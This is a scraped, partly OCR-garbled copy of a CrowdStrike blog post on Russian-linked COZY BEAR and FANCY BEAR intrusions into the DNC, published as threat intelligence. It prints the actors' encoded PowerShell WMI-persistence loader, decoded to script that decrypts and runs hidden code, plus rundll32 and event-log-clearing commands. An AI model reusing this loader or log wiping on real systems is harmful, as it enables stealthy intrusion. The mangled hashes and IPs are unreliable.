Bears in the Midst: Intrusion into the Democratic National Committee »


https://www.crowdstrike.com/
https://www.crowdstrike.com/blog/
https://www.crowdstrike.com/blog/
#
https://www.crowdstrike.com/blog/author/dmitri/
https://www.crowdstrike.com/blog/category/from-the-front-lines/
Sw | BLOG

Bears in the Midst: Intrusion into the Democratic
National Committee

®.Peverse "P_Atrey)): bg.

m8, void @); -1 a oo Fh < Bie
; b && a.splic ’
<b && a.splice(b, 1); return = tae

@.replace(RegExp(",", "g"), * "hel
») { for (var c = @, d = O30 < Bee
&& c++; } return c; } a

i. d = @:d < a.lengthsd++) 4
- od
, - + function ay
preak; } } retuln © 10) a2

June 15, 2016 UPDATE:

CrowdStrike stands fully by its analysis and findings identifying two separate Russian
intelligence-affiliated adversaries presentin the DNC network in May 2016. On June 15, 2016 a blog
post to a WordPress site authored by an individual using the moniker Guccifer 2.0 claiming credit
for breaching the Democratic National Committee. This blog post presents documents alleged to

have originated from the DNC.

Whether or not this posting is part of a Russian Intelligence disinformation campaign, we are
exploring the documents’ authenticity and origin. Regardless, these claims do nothing to lessen
our findings relating to the Russian government's involvement, portions of which we have

documented for the public and the greater security community.

There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach ata

company somewhere around the globe. In all of these cases, we operate under strict




https://www.washingtonpost.com/world/national-security/russian-government-hackers-penetrated-dnc-stole-opposition-research-on-trump/2016/06/14/cf006cb4-316e-11e6-8ff7-7b6c1998b7a0_story.html
https://www.crowdstrike.com/products/falcon-host/
http://www.thedailybeast.com/articles/2015/04/08/obama-to-putin-stop-hacking-me.html
http://www.cnn.com/2015/03/10/politics/state-department-hack-worst-ever/
https://www.theguardian.com/technology/2015/aug/06/us-military-joint-chiefs-hacked-officials-blame-russia
confidentiality rules with our customers and cannot reveal publicly any information about these
attacks. But on rare occasions, acustomer decides to go public with information about their
incident and give us permission to share our knowledge of the adversary tradecraft with the
broader community and help protect even those who do not happen to be our customers. This

story is about one of those cases.

CrowdStrike Services Inc., our Incident Response group, wascalled by the Democratic National
Committee (DNC), the formal governing body for the US Democratic Party, torespond toa
suspected breach. We deployed our IR team and technology and immediately identified two
sophisticated adversaries on the network - COZY BEAR and FANCY BEAR. We've had lots of
experience with both of these actors attempting to target our customers in the past and know
them well. In fact, our team considers them some of the best adversaries out of all the numerous
nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis. Their
tradecraftis superb, operational security second to none and the extensive usage of ‘living-off-
the-land’ techniques enables them to easily bypass many security solutions they encounter. In
particular, we identified advanced methods consistent with nation-state level capabilities
including deliberate targeting and ‘access management tradecraft - both groups were constantly
going back into the environment to change out their implants, modify persistent methods, move
to new Command & Control channels and perform other tasks to try to stay ahead of being
detected. Both adversaries engage in extensive political and economic espionage for the benefit of
the government of the Russian Federation and are believed to be closely linked to the Russian

government's powerful and highly capable intelligence services.

COZY BEAR (also referred to in some industry reports as CozyDuke or APT 29) is the adversary
group thatlast year successfully infiltrated the unclassified networks of the White House, State
Department, and US Joint Chiefs of Staff In addition to the US government, they have targeted
organizations across the Defense, Energy, Extractive, Financial, Insurance, Legal, Manufacturing
Media, Think Tanks, Pharmaceutical, Research and Technology industries, along with Universities.
Victims have also been observed in Western Europe, Brazil, China, Japan, Mexico, New Zealand,
South Korea, Turkey and Central Asian countries. COZY BEAR’s preferred intrusion methodis a
broadly targeted spearphish campaign that typically includes web links to a malicious dropper.
Once executed on the machine, the code will deliver one of anumber of sophisticated Remote
Access Tools (RATS), including AdobeARM, ATl-Agent, and MiniDionis. On many occasions, both the
dropper and the payload will contain a range of techniques to ensure the sample is not being
analyzed on a virtual machine, using a debugger, or located within a sandbox. They have extensive
checks for the various security software thatis installed on the system and their specific
configurations. When specific versions are discovered that may cause issues for the RAT, it
promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-
testing regime thatis highly attuned to slight configuration issues that may resultin their
detection, and which would cause them to deploy a different tool instead. The implants are highly
configurable via encrypted configuration files, which allow the adversary to customize various
components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms,
encryption keys and others. An HTTP protocol with encrypted payload is used for the Command &

Control communication.




Главное Разведывательное Управление

“ ”

Федеральная Служба Безопасности

Служба Внешней Разведки

powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand
ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoACQAJACQAYwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACQAbQBzACwAIAAkAGMAcgBUAHIALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAE0AbwBkAGUAXQA6ADoAVwByAGkAdABlACkADQAKAAkACQAkAGMAcwAuAFcAcgBpAHQAZQAoACQAZABhAHQAYQAsACAAMAAsACAAJABkAGEAdABhAC4ATABlAG4AZwB0AGgAKQANAAoACQAJACQAYwBzAC4ARgBsAHUAcwBoAEYAaQBuAGEAbABCAGwAbwBjAGsAKAApAA0ACgAJAAkAJAByAGUAdAAgAD0AIAAkAG0AcwAuAFQAbwBBAHIAcgBhAHkAKAApAA0ACgAJAAkAJABjAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAAkAJABtAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAGUAYwByAEEAZQBzACgAJABlAG4AYwBEAGEAdABhACwAIAAkAGsAZQB5ACwAIAAkAGkAdgApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHAAcgBvAHYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAANAAoACQAJACQAcAByAG8AdgAuAEsAZQB5ACAAPQAgACQAawBlAHkADQAKAAkACQAkAHAAcgBvAHYALgBJAFYAIAA9ACAAJABpAHYADQAKAAkACQAkAGQAZQBjAHIAIAA9ACAAJABwAHIAbwB2AC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkAHAAcgBvAHYALgBLAGUAeQAsACAAJABwAHIAbwB2AC4ASQBWACkADQAKAAkACQAkAHIAZQB0ACAAPQAgAHAAZQByAGYAQwByACAAJABkAGUAYwByACAAJABlAG4AYwBEAGEAdABhAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAFcAUAAoACQAYwBOACwAIAAkAHAATgAsACAAJABhAEsALAAgACQAYQBJACkADQAKAHsADQAKAAkAaQBmACgAJABjAE4AIAAtAGUAcQAgACQAbgB1AGwAbAAgAC0AbwByACAAJABwAE4AIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAcgBlAHQAdQByAG4AIAAkAGYAYQBsAHMAZQB9AA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHcAcAAgAD0AIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJABjAE4AKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAkAHAATgBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAJABlAHgARQBuACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AHAAKQANAAoACQAJACQAZQB4AEQAZQBjACAAPQAgAGQAZQBjAHIAQQBlAHMAIAAkAGUAeABFAG4AIAAkAGEASwAgACQAYQBJAA0ACgAJAAkAJABlAHgAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZQB4AEQAZQBjACkADQAKAAkACQBpAGYAKAAkAGUAeAAgAC0AZQBxACAAJABuAHUAbABsACAALQBvAHIAIAAkAGUAeAAgAC0AZQBxACAAJwAnACkADQAKAAkACQB7AHIAZQB0AHUAcgBuAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGUAeAANAAoACQAJAHIAZQB0AHUAcgBuACAAJAB0AHIAdQBlAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsADQAKAAkACQByAGUAdAB1AHIAbgAgACQAZgBhAGwAcwBlAA0ACgAJAH0ADQAKAH0ADQAKAA0ACgAkAGEAZQBLACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGUANwAsACAAMAB4AGQANgAsACAAMAB4AGIAZQAsACAAMAB4AGEAOQAsACAAMAB4AGIANwAsACAAMAB4AGUANgAsACAAMAB4ADUANQAsACAAMAB4ADMAYQAsACAAMAB4AGUAZQAsACAAMAB4ADEANgAsACAAMAB4ADcAOQAsACAAMAB4AGMAYQAsACAAMAB4ADUANgAsACAAMAB4ADAAZgAsACAAMAB4AGIAYwAsACAAMAB4ADMAZgAsACAAMAB4ADIAMgAsACAAMAB4AGUAZAAsACAAMAB4AGYAZgAsACAAMAB4ADAAMgAsACAAMAB4ADQAMwAsACAAMAB4ADQAYwAsACAAMAB4ADEAYgAsACAAMAB4AGMAMAAsACAAMAB4AGUANwAsACAAMAB4ADUANwAsACAAMAB4AGIAMgAsACAAMAB4AGMAYgAsACAAMAB4AGQAOAAsACAAMAB4AGMAZQAsACAAMAB4AGQAYQAsACAAMAB4ADAAMAApAA0ACgAkAGEAZQBJACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGIAZQAsACAAMAB4ADcAYQAsACAAMAB4ADkAMAAsACAAMAB4AGQAOQAsACAAMAB4AGQANQAsACAAMAB4AGYANwAsACAAMAB4AGEAYQAsACAAMAB4ADYAZAAsACAAMAB4AGUAOQAsACAAMAB4ADEANgAsACAAMAB4ADYANAAsACAAMAB4ADEAZAAsACAAMAB4ADkANwAsACAAMAB4ADEANgAsACAAMAB4AGMAMAAsACAAMAB4ADYANwApAA0ACgBzAFcAUAAgACcAVwBtAGkAJwAgACcAVwBtAGkAJwAgACQAYQBlAEsAIAAkAGEAZQBJACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=

http://www.ft.com/cms/s/0/668a131e-1928-11e6-b197-a4af20d5575e.html
http://www.bbc.com/news/world-europe-33072034
http://www.ecfr.eu/publications/summary/putins_hydra_inside_russias_intelligence_services


function perfCr($crTr, $data){
$ret = $null
try{
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList
@($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
}
catch{}
return $ret
}
function decrAes($encData, $key, $iv)
{
$ret = $null
try{
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
}
Catch{}
return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
if($cN -eq $null -or $pN -eq $null){return $false}
try{
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq ”)
{return}
Invoke-Expression $ex
return $true
}
catch{
return $false



return $false
}
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee,
0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43,
0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9,
0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null

rundll32.exe “C:\Windows\twain_64.dll”

wevtutil cl
System wevtutil cl Security



http://twitter.com/share?text=Bears in the Midst%3A Intrusion into the Democratic National Committee&url=http%3A%2F%2Fwww.crowdstrike.com%2Fblog%2Fbears-midst-intrusion-democratic-national-committee%2F
http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.crowdstrike.com%2Fblog%2Fbears-midst-intrusion-democratic-national-committee%2F&title=Bears in the Midst%3A Intrusion into the Democratic National Committee&summary=%3Cp%3EJune 15%2C 2016 UPDATE%3A CrowdStrike stands fully by its analysis and findings identifying two separate Russian intelligence-affiliated adversaries present in the DNC network in May 2016. On June 15%2C 2016 a blog post to a Wordpress site authored by an%26hellip%3B%3C%2Fp%3E&source=https://www.crowdstrike.com/blog/
https://www.crowdstrike.com/blog/staff-member/dmitri-alperovitch/
b101cd29e18.a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae | COZY SHA256 | pag
BEAR

(Se

185[]100[184[1134:443 COZY C2 Sea
BEAR

58[]49[]58[]58:443 COZY C2 Sea
BEAR

218[.]1[]98[]203:80 COZY C2 Pow

BEAR C2

1871.1331133[18:80 COZY C2 Pow

BEAR C2

fd39d2837b30e7233bc54598 ff5lbdc2fsc4i8fa5b94dea2cadb24cf40f395e5 | FANCY SHA256 | twa
BEAR

(64-

ime

48 45761c9bed0563d0aa83613311191e075a9b58861e80392914d6la2ibad976 FANCY SHA256 | Vml

BEAR (X-1

40ae43b7d6c413becc92b07076fal28b875c8dbb4da7c036639eccfS5a9fc784f | FANCY SHA256 | Vml
BEAR

(X-1

185[]86[]148[]227:443 FANCY C2 X-A,
BEAR

45[]32[]129[]185:443 FANCY C2 X-Tl
BEAR

23[]227[]196L]217:443 FANCY C2 X-Tl
BEAR

VY Tweet in Share

Dmitri Aloerovitch

Co-founder and CTO of Crowdstrike, Dmitri Alperovitch leads the Intelligence,

Technology and CrowdStrike Labs teams. Alperovitch has invented 18 patented




…

…

“
”

https://www.crowdstrike.com/blog/reconnaissance-detection-blue-team/
https://www.crowdstrike.com/blog/reconnaissance-detection-blue-team/
https://www.crowdstrike.com/blog/more-than-just-your-esignature-the-analysis/
https://www.crowdstrike.com/blog/more-than-just-your-esignature-the-analysis/
technologies and has conducted extensive research on reputation systems, spam
detection, web security, public-key and identity-based cryptography, malware and
intrusion detection/prevention. He is arenowned computer security researcher and
thought leader on cybersecurity policies and state tradecraft Alperovitch’s many
honors include being selected as MIT Technology Review’s “Young Innovators under
35” (TR35) in 2013. He also was named Foreign Policy Magazine’s Leading Global
Thinker for 2013 and received a Federal 100 Award for his information security

contributions.

Related Content

Reconnaissance Detection (Blue Team)

As we move through this Red Team vs. Blue Team series, our intent is to provide...

More Than Just Your eSignature: The Analysis

CrowdStrike recently conducted an investigation for a client operating in the healthcare sector that

was subject...




…

https://www.crowdstrike.com/blog/heading-black-hat-2016/
https://www.crowdstrike.com/blog/heading-black-hat-2016/
https://www.crowdstrike.com/blog/category/endpoint-protection/
https://www.crowdstrike.com/blog/category/executive-viewpoint/
https://www.crowdstrike.com/blog/category/from-the-front-lines/
https://www.crowdstrike.com/blog/category/threat-intel-research/
https://www.crowdstrike.com/blog/crowdstrike-forrester-help-demystify-next-gen-endpoint-protection/
(

Without a doubt, Black Hat Is one of the marquee events that gathers together the entire...

Heading to Black Hat 2016

C AT EG OR IE S

4} ENDPOINT PROTECTION
@ EXECUTIVE VIEWPOINT
FROM THE FRONT LINES

RESEARCH & THREAT INTEL

Sw CROWDSTRIKE

FKORRESTER’
CKC




“ ”

https://www.crowdstrike.com/blog/crowdstrike-forrester-help-demystify-next-gen-endpoint-protection/
https://twitter.com/CrowdStrike
https://www.facebook.com/CrowdStrike
https://plus.google.com/101967380457820256808/posts
https://www.linkedin.com/company/crowdstrike
https://www.youtube.com/user/CrowdStrike
https://www.crowdstrike.com/blog/feed
https://www.crowdstrike.com/blog/heading-black-hat-2016/
https://www.crowdstrike.com/blog/irreversible-effects-ransomware-attack/
https://www.crowdstrike.com/blog/toolkit-helps-evaluate-next-generation-endpoint-protection-platforms/
https://www.crowdstrike.com/blog/gartners-comparison-of-endpoint-detection-and-response-technologies-and-solutions/
https://www.crowdstrike.com/see-demo/
CrowdStrike and Forrester Help Demystify Next-Gen Endpoint Protection
June 27, 2016

C ON N E C T W | T H US

y f Gin @ Dd

F E A T U R_E D A RT 1 C L E S$

Heading to Black Hat 2016
July 22, 2016

The Irreversible Effects of Ransomware Attack
July 20, 2016

Toolkit Helps Evaluate “Next Generation” Endpoint Protection Platforms
July 19, 2016

CrowdStrike evaluated in Gartner’s Comparison of Endpoint Detection and Response Technologies
and Solutions
July 19, 2016

SUBSCRIBE

Sign up now to receive the latest notifications and updates from CrowdStrike.

Ss

See CrowdsStrike Falcon in Action

Detect, prevent, and respond to attacks— even malware-free intrusions—at any stage, with

next-generation endpoint protection.




©

https://www.crowdstrike.com/blog/crowdresponse-release-new-tasks-modules/
https://www.crowdstrike.com/blog/irreversible-effects-ransomware-attack/
https://twitter.com/CrowdStrike
https://www.facebook.com/CrowdStrike/
https://plus.google.com/101967380457820256808/posts
https://www.linkedin.com/company/crowdstrike
http://www.youtube.com/user/CrowdStrike
/privacy-notice/
/request-information/
/blog
/join-our-team/
/sitemap/
/contact-us/
#
« CrowdResponse Release and new @Tasks The Irreversible Effects of Ransomware Attack

modules »

Se CROWDSTRIKE

OOOO®

Copyright © 2016 CrowdStrike
Privacy | Request Info | Blog | Join Our Team | Sitemap | Contact Us | 1888.512.8906



	Bears in the Midst: Intrusion into the Democratic National Committee
	June 15, 2016 UPDATE:
	Dmitri Alperovitch
	Reconnaissance Detection (Blue Team)
	More Than Just Your eSignature: The Analysis
	Heading to Black Hat 2016
	CATEGORIES
	CONNECT WITH US
	FEATURED ARTICLES
	SUBSCRIBE
	See CrowdStrike Falcon in Action